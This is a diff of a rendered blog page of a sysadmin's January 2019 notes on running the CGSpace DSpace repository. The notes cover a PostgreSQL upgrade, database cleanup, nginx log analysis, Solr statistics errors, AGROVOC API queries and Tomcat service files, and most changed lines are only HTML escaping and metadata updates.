# tar -cvzpf var-lib-postgresql-9.5.tar.gz /var/lib/postgresql/9.5
# tar -cvzpf etc-postgresql-9.5.tar.gz /etc/postgresql/9.5
@ -519,22 +519,22 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
# pg_dropcluster 9.6 main
# pg_upgradecluster 9.5 main
# pg_dropcluster 9.5 main
# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.5 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><ul>
<li>I&rsquo;ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments</li>
<li>Run all system updates on CGSpace (linode18) and restart the server</li>
<li>Try to run the DSpace cleanup script on CGSpace (linode18), but I get some errors about foreign key constraints:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
- Deleting bitstream information (ID: 158227)
- Deleting bitstream record from database (ID: 158227)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(158227) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(158227) is still referenced from table &#34;bundle&#34;.
...
</code></pre><ul>
<li>As always, the solution is to delete those IDs manually in PostgreSQL:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);&#39;
UPDATE 1
</code></pre><ul>
<li>After all that I started a full Discovery reindex to get the index name changes and rights updates</li>
@ -544,7 +544,7 @@ UPDATE 1
<li>CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat</li>
<li>The top IP addresses as of this evening are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
963 40.77.167.152
987 35.237.175.180
1062 40.77.167.55
@ -558,7 +558,7 @@ UPDATE 1
</code></pre><ul>
<li>And just around the time of the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &quot;29/Dec/2018:1(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E &#34;29/Dec/2018:1(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
115 66.249.66.223
118 207.46.13.14
123 34.218.226.147
@ -594,15 +594,15 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -12,7 +12,7 @@
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -27,7 +27,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-01/" />
<meta property="article:published_time" content="2019-01-02T09:48:30+02:00" />
<meta property="article:modified_time" content="2020-10-19T15:23:30+03:00" />
<meta property="article:modified_time" content="2022-03-22T22:03:59+03:00" />
@ -38,7 +38,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
I don&rsquo;t see anything interesting in the web server logs around that time though:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -50,7 +50,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
357 207.46.13.1
903 54.70.40.11
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -62,7 +62,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
"url": "https://alanorth.github.io/cgspace-notes/2019-01/",
"wordCount": "5531",
"datePublished": "2019-01-02T09:48:30+02:00",
"dateModified": "2020-10-19T15:23:30+03:00",
"dateModified": "2022-03-22T22:03:59+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -80,12 +80,12 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -131,7 +131,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<p class="blog-post-meta">
<time datetime="2019-01-02T09:48:30+02:00">Wed Jan 02, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -141,7 +141,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -155,20 +155,20 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
</code></pre><ul>
<li>Analyzing the types of requests made by the top few IPs during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 54.70.40.11 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 54.70.40.11 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
30 bitstream
534 discover
352 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 207.46.13.1 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 207.46.13.1 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
194 bitstream
345 handle
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | grep 46.101.86.248 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | grep 46.101.86.248 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
261 handle
</code></pre><ul>
<li>It&rsquo;s not clear to me what was causing the outbound traffic spike</li>
<li>Oh nice! The once-per-year cron job for rotating the Solr statistics actually worked now (for the first time ever!):</li>
</ul>
<pre><code>Moving: 81742 into core statistics-2010
<pre tabindex="0"><code>Moving: 81742 into core statistics-2010
Moving: 1837285 into core statistics-2011
Moving: 3764612 into core statistics-2012
Moving: 4557946 into core statistics-2013
@ -185,7 +185,7 @@ Moving: 18497180 into core statistics-2018
<ul>
<li>Update local Docker image for DSpace PostgreSQL, re-using the existing data volume:</li>
</ul>
<pre><code>$ sudo docker pull postgres:9.6-alpine
<pre tabindex="0"><code>$ sudo docker pull postgres:9.6-alpine
$ sudo docker rm dspacedb
$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><ul>
@ -197,7 +197,7 @@ $ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/d
</li>
<li>The JSPUI application—which Listings and Reports depends upon—also does not load, though the error is perhaps unrelated:</li>
</ul>
<pre><code>2019-01-03 14:45:21,727 INFO org.dspace.browse.BrowseEngine @ anonymous:session_id=9471D72242DAA05BCC87734FE3C66EA6:ip_addr=127.0.0.1:browse_mini:
<pre tabindex="0"><code>2019-01-03 14:45:21,727 INFO org.dspace.browse.BrowseEngine @ anonymous:session_id=9471D72242DAA05BCC87734FE3C66EA6:ip_addr=127.0.0.1:browse_mini:
2019-01-03 14:45:21,971 INFO org.dspace.app.webui.discovery.DiscoverUtility @ facets for scope, null: 23
2019-01-03 14:45:22,115 WARN org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=9471D72242DAA05BCC87734FE3C66EA6:internal_error:-- URL Was: http://localhost:8080/jspui/internal-error
-- Method: GET
@ -283,7 +283,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
<ul>
<li>Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don&rsquo;t see anything around that time in the web server logs:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Jan/2019:1(7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Jan/2019:1(7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 207.46.13.192
217 31.6.77.23
340 66.249.70.29
@ -298,7 +298,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
<li>I&rsquo;m thinking about trying to validate our <code>dc.subject</code> terms against <a href="http://aims.fao.org/agrovoc/webservices">AGROVOC webservices</a></li>
<li>There seem to be a few APIs and the documentation is kinda confusing, but I found this REST endpoint that does work well, for example searching for <code>SOIL</code>:</li>
</ul>
<pre><code>$ http http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&amp;lang=en
<pre tabindex="0"><code>$ http http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&amp;lang=en
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: Keep-Alive
@ -313,39 +313,39 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [
&#34;results&#34;: [
{
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;soil&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;soil&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_7156&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_7156&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
}
],
&quot;uri&quot;: &quot;&quot;
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>The API does not appear to be case sensitive (searches for <code>SOIL</code> and <code>soil</code> return the same thing)</li>
<li>I&rsquo;m a bit confused that there&rsquo;s no obvious return code or status when a term is not found, for example <code>SOILS</code>:</li>
</ul>
<pre><code>HTTP/1.1 200 OK
<pre tabindex="0"><code>HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: Keep-Alive
Content-Length: 367
@ -359,55 +359,55 @@ X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM http://aims.fao.org
{
&quot;@context&quot;: {
&quot;@language&quot;: &quot;en&quot;,
&quot;altLabel&quot;: &quot;skos:altLabel&quot;,
&quot;hiddenLabel&quot;: &quot;skos:hiddenLabel&quot;,
&quot;isothes&quot;: &quot;http://purl.org/iso25964/skos-thes#&quot;,
&quot;onki&quot;: &quot;http://schema.onki.fi/onki#&quot;,
&quot;prefLabel&quot;: &quot;skos:prefLabel&quot;,
&quot;results&quot;: {
&quot;@container&quot;: &quot;@list&quot;,
&quot;@id&quot;: &quot;onki:results&quot;
&#34;@context&#34;: {
&#34;@language&#34;: &#34;en&#34;,
&#34;altLabel&#34;: &#34;skos:altLabel&#34;,
&#34;hiddenLabel&#34;: &#34;skos:hiddenLabel&#34;,
&#34;isothes&#34;: &#34;http://purl.org/iso25964/skos-thes#&#34;,
&#34;onki&#34;: &#34;http://schema.onki.fi/onki#&#34;,
&#34;prefLabel&#34;: &#34;skos:prefLabel&#34;,
&#34;results&#34;: {
&#34;@container&#34;: &#34;@list&#34;,
&#34;@id&#34;: &#34;onki:results&#34;
},
&quot;skos&quot;: &quot;http://www.w3.org/2004/02/skos/core#&quot;,
&quot;type&quot;: &quot;@type&quot;,
&quot;uri&quot;: &quot;@id&quot;
&#34;skos&#34;: &#34;http://www.w3.org/2004/02/skos/core#&#34;,
&#34;type&#34;: &#34;@type&#34;,
&#34;uri&#34;: &#34;@id&#34;
},
&quot;results&quot;: [],
&quot;uri&quot;: &quot;&quot;
&#34;results&#34;: [],
&#34;uri&#34;: &#34;&#34;
}
</code></pre><ul>
<li>I guess the <code>results</code> object will just be empty&hellip;</li>
<li>Another way would be to try with SPARQL, perhaps using the Python 2.7 <a href="https://pypi.org/project/sparql-client/">sparql-client</a>:</li>
</ul>
<pre><code>$ python2.7 -m virtualenv /tmp/sparql
<pre tabindex="0"><code>$ python2.7 -m virtualenv /tmp/sparql
$ . /tmp/sparql/bin/activate
$ pip install sparql-client ipython
$ ipython
In [10]: import sparql
In [11]: s = sparql.Service(&quot;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&quot;, &quot;utf-8&quot;, &quot;GET&quot;)
In [12]: statement=('PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; '
...: 'SELECT '
...: '?label '
...: 'WHERE { '
...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } '
...: 'FILTER regex(str(?label), &quot;^fish&quot;, &quot;i&quot;) . '
...: '} LIMIT 10')
In [11]: s = sparql.Service(&#34;http://agrovoc.uniroma2.it:3030/agrovoc/sparql&#34;, &#34;utf-8&#34;, &#34;GET&#34;)
In [12]: statement=(&#39;PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt; &#39;
...: &#39;SELECT &#39;
...: &#39;?label &#39;
...: &#39;WHERE { &#39;
...: &#39;{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } &#39;
...: &#39;FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) . &#39;
...: &#39;} LIMIT 10&#39;)
In [13]: result = s.query(statement)
In [14]: for row in result.fetchone():
...: print(row)
...:
(&lt;Literal &quot;fish catching&quot;@en&gt;,)
(&lt;Literal &quot;fish harvesting&quot;@en&gt;,)
(&lt;Literal &quot;fish meat&quot;@en&gt;,)
(&lt;Literal &quot;fish roe&quot;@en&gt;,)
(&lt;Literal &quot;fish conversion&quot;@en&gt;,)
(&lt;Literal &quot;fisheries catches (composition)&quot;@en&gt;,)
(&lt;Literal &quot;fishtail palm&quot;@en&gt;,)
(&lt;Literal &quot;fishflies&quot;@en&gt;,)
(&lt;Literal &quot;fishery biology&quot;@en&gt;,)
(&lt;Literal &quot;fish production&quot;@en&gt;,)
(&lt;Literal &#34;fish catching&#34;@en&gt;,)
(&lt;Literal &#34;fish harvesting&#34;@en&gt;,)
(&lt;Literal &#34;fish meat&#34;@en&gt;,)
(&lt;Literal &#34;fish roe&#34;@en&gt;,)
(&lt;Literal &#34;fish conversion&#34;@en&gt;,)
(&lt;Literal &#34;fisheries catches (composition)&#34;@en&gt;,)
(&lt;Literal &#34;fishtail palm&#34;@en&gt;,)
(&lt;Literal &#34;fishflies&#34;@en&gt;,)
(&lt;Literal &#34;fishery biology&#34;@en&gt;,)
(&lt;Literal &#34;fish production&#34;@en&gt;,)
</code></pre><ul>
<li>The SPARQL query comes from my notes in <a href="/cgspace-notes/2017-08/">2017-08</a></li>
</ul>
@ -466,7 +466,7 @@ In [14]: for row in result.fetchone():
</li>
<li>I am testing the speed of the WorldFish DSpace repository&rsquo;s REST API and it&rsquo;s five to ten times faster than CGSpace as I tested in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre><code>$ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
0.16s user 0.03s system 3% cpu 5.185 total
0.17s user 0.02s system 2% cpu 7.123 total
@ -474,7 +474,7 @@ In [14]: for row in result.fetchone():
</code></pre><ul>
<li>In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;14/Jan/2019:(17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;14/Jan/2019:(17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 31.6.77.23
192 54.70.40.11
202 66.249.64.157
@ -599,11 +599,11 @@ In [14]: for row in result.fetchone():
<ul>
<li>In the Solr admin UI I see the following error:</li>
</ul>
<pre><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>Looking in the Solr log I see this:</li>
</ul>
<pre><code>2019-01-16 13:37:55,395 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
<pre tabindex="0"><code>2019-01-16 13:37:55,395 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
org.apache.solr.common.SolrException: Error opening new searcher
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
@ -651,7 +651,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
@ -721,7 +721,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>For 2019-01 alone the Usage Stats are already around 1.2 million</li>
<li>I tried to look in the nginx logs to see how many raw requests there are so far this month and it&rsquo;s about 1.4 million:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
1442874
real 0m17.161s
@ -786,7 +786,7 @@ sys 0m2.396s
<ul>
<li>That&rsquo;s weird, I logged into DSpace Test (linode19) and it says it has been up for 213 days:</li>
</ul>
<pre><code># w
<pre tabindex="0"><code># w
04:46:14 up 213 days, 7:25, 4 users, load average: 1.94, 1.50, 1.35
</code></pre><ul>
<li>I&rsquo;ve definitely rebooted it several times in the past few months&hellip; according to <code>journalctl -b</code> it was a few weeks ago on 2019-01-02</li>
@ -803,7 +803,7 @@ sys 0m2.396s
<li>Investigating running Tomcat 7 on Ubuntu 18.04 with the tarball and a custom systemd package instead of waiting for our DSpace to get compatible with Ubuntu 18.04&rsquo;s Tomcat 8.5</li>
<li>I could either run with a simple <code>tomcat7.service</code> like this:</li>
</ul>
<pre><code>[Unit]
<pre tabindex="0"><code>[Unit]
Description=Apache Tomcat 7 Web Application Container
After=network.target
[Service]
@ -817,7 +817,7 @@ WantedBy=multi-user.target
</code></pre><ul>
<li>Or try to use adapt a real systemd service like Arch Linux&rsquo;s:</li>
</ul>
<pre><code>[Unit]
<pre tabindex="0"><code>[Unit]
Description=Tomcat 7 servlet container
After=network.target
@ -859,48 +859,48 @@ WantedBy=multi-user.target
<li>I think I might manage this the same way I do the restic releases in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>, where I download a specific version and symlink to some generic location without the version number</li>
<li>I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;33&quot; start=&quot;0&quot;&gt;
$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view' | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;241&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;33&#34; start=&#34;0&#34;&gt;
$ http &#39;http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>I opened an issue on the GitHub issue tracker (<a href="https://github.com/ilri/dspace-statistics-api/issues/10">#10</a>)</li>
<li>I don&rsquo;t think the <a href="https://solrclient.readthedocs.io/en/latest/">SolrClient library</a> we are currently using supports these type of queries so we might have to just do raw queries with requests</li>
<li>The <a href="https://github.com/django-haystack/pysolr">pysolr</a> library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):</li>
</ul>
<pre><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
print(results.facets['facet_fields'])
{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;, &#39;facet&#39;: &#39;true&#39;, &#39;facet.field&#39;: &#39;id&#39;, &#39;facet.mincount&#39;: 1, &#39;facet.limit&#39;: 10, &#39;facet.offset&#39;: 0, &#39;rows&#39;: 0})
print(results.facets[&#39;facet_fields&#39;])
{&#39;id&#39;: [&#39;77572&#39;, 646, &#39;93185&#39;, 380, &#39;92932&#39;, 375, &#39;102499&#39;, 372, &#39;101430&#39;, 337, &#39;77632&#39;, 331, &#39;102449&#39;, 289, &#39;102485&#39;, 276, &#39;100849&#39;, 270, &#39;47080&#39;, 260]}
</code></pre><ul>
<li>If I double check one item from above, for example <code>77572</code>, it appears this is only working on the current statistics core and not the shards:</li>
</ul>
<pre><code>import pysolr
solr = pysolr.Solr('http://localhost:3000/solr/statistics')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
<pre tabindex="0"><code>import pysolr
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
print(results.hits)
646
solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics-2018/&#39;)
results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
